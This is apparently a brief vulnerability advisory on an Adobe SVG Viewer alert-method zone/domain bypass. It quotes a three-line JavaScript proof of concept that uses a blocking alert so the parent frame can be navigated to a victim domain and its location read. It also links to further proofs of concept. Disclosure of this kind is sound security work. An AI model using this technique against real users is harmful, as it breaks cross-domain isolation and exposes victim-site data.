Adobe SVG Viewer Alert Method Zone/Domain Bypass Vulnerability

Adobe SVG Viewer Alert Method Zone/Domain Bypass Vulnerability

The following example was provided:

alert("Press OK to continue...");
// At this point, another thread changes the parent URL to the victim domain
parent.alert(parent.location.href); // Outputs victim domain once the user pressed OK

Proof-of-concepts have been made available on the following web page:

http://sec.greymagic.com/adv/gm004-mc/